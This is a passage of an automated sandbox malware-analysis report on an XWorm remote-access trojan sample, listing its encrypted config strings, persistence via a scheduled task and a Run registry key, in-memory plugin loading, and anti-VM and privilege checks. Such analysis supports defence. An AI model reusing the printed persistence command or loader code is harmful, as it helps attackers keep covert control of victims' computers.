Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: XClient.exe.bin.exe, Settings.cs	Base64 encoded string: 'XlqRI871NV4HjiTBdLG6vPDYZvTk226ejywJUVnaMrjycvVz8DwGYMTDgjeHEjCj', 'kZwQW6p2Ywp4q1oU06zLrVA57awHOcoEWpr6w7w7SpcV05hZHUhxs+FTiW6fHpE2', 'IxBejiTC3AmRynPOqJJOnpCZUlQRDnBxeqwp/MYh9YLabI1/8TQ+yBMR1CD5kkl1', '+agVRd7GXXKa6tObpCAdBdve9YblloX80BGNwkHocdL8heshE/OLhnOBuYQjzF3S'
Source: checkcoin.0.dr, Settings.cs	Base64 encoded string: 'XlqRI871NV4HjiTBdLG6vPDYZvTk226ejywJUVnaMrjycvVz8DwGYMTDgjeHEjCj', 'kZwQW6p2Ywp4q1oU06zLrVA57awHOcoEWpr6w7w7SpcV05hZHUhxs+FTiW6fHpE2', 'IxBejiTC3AmRynPOqJJOnpCZUlQRDnBxeqwp/MYh9YLabI1/8TQ+yBMR1CD5kkl1', '+agVRd7GXXKa6tObpCAdBdve9YblloX80BGNwkHocdL8heshE/OLhnOBuYQjzF3S'
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Settings.cs	Base64 encoded string: 'XlqRI871NV4HjiTBdLG6vPDYZvTk226ejywJUVnaMrjycvVz8DwGYMTDgjeHEjCj', 'kZwQW6p2Ywp4q1oU06zLrVA57awHOcoEWpr6w7w7SpcV05hZHUhxs+FTiW6fHpE2', 'IxBejiTC3AmRynPOqJJOnpCZUlQRDnBxeqwp/MYh9YLabI1/8TQ+yBMR1CD5kkl1', '+agVRd7GXXKa6tObpCAdBdve9YblloX80BGNwkHocdL8heshE/OLhnOBuYQjzF3S'

Source: checkcoin.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: checkcoin.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: XClient.exe.bin.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe.bin.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: C:\Users\user\checkcoin	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Mutant created: \Sessions\1\BaseNamedObjects\W0f7YpeDQosHbW9j
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\XClient.exe.bin.exe "C:\Users\user\Desktop\XClient.exe.bin.exe"
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "checkcoin" /tr "C:\Users\user\checkcoin"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\checkcoin C:\Users\user\checkcoin
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown	Process created: C:\Users\user\checkcoin C:\Users\user\checkcoin
Source: unknown	Process created: C:\Users\user\checkcoin C:\Users\user\checkcoin
Source: unknown	Process created: C:\Users\user\checkcoin C:\Users\user\checkcoin
Source: unknown	Process created: C:\Users\user\checkcoin C:\Users\user\checkcoin
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "checkcoin" /tr "C:\Users\user\checkcoin"	Jump to behavior

Source: XClient.exe.bin.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.bin.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.bin.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: checkcoin.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: checkcoin.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: checkcoin.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

Source: XClient.exe.bin.exe, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: XClient.exe.bin.exe, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: XClient.exe.bin.exe, Messages.cs	.Net Code: Memory
Source: checkcoin.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: checkcoin.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: checkcoin.0.dr, Messages.cs	.Net Code: Memory
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run checkcoin			Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run checkcoin			Jump to behavior

Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\checkcoin	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Memory allocated: 14E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Memory allocated: 1B010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\checkcoin	Memory allocated: AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\checkcoin	Memory allocated: 1A690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\checkcoin	Memory allocated: 2D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\checkcoin	Memory allocated: 1AF30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\checkcoin	Memory allocated: 1470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\checkcoin	Memory allocated: 1B560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\checkcoin	Memory allocated: BA0000 memory reserve \| memory write watch
Source: C:\Users\user\checkcoin	Memory allocated: 1A7C0000 memory reserve \| memory write watch
Source: C:\Users\user\checkcoin	Memory allocated: 760000 memory reserve \| memory write watch
Source: C:\Users\user\checkcoin	Memory allocated: 1A3D0000 memory reserve \| memory write watch

Source: C:\Users\user\checkcoin	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\checkcoin	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\checkcoin	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\checkcoin	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\checkcoin	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Window / User API: threadDelayed 2860			Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Window / User API: threadDelayed 6060			Jump to behavior

Source: C:\Users\user\Desktop\XClient.exe.bin.exe TID: 4724	Thread sleep time: -2860000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe TID: 4724	Thread sleep time: -6060000s >= -30000s	Jump to behavior
Source: C:\Users\user\checkcoin TID: 5224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\checkcoin TID: 5300	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\checkcoin TID: 1252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\checkcoin TID: 3552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\checkcoin TID: 424	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\XClient.exe.bin.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\checkcoin	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\checkcoin	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\checkcoin	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\checkcoin	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\checkcoin	File Volume queried: C:\ FullSizeInformation

Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C006000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW}}3
Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C006000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA+
Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C006000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\checkcoin	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\checkcoin	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\checkcoin	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\checkcoin	Process token adjusted: Debug
Source: C:\Users\user\checkcoin	Process token adjusted: Debug

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report XClient.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
XClient.exe.bin.exe

Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Queries volume information: C:\Users\user\Desktop\XClient.exe.bin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe.bin.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\checkcoin	Queries volume information: C:\Users\user\checkcoin VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
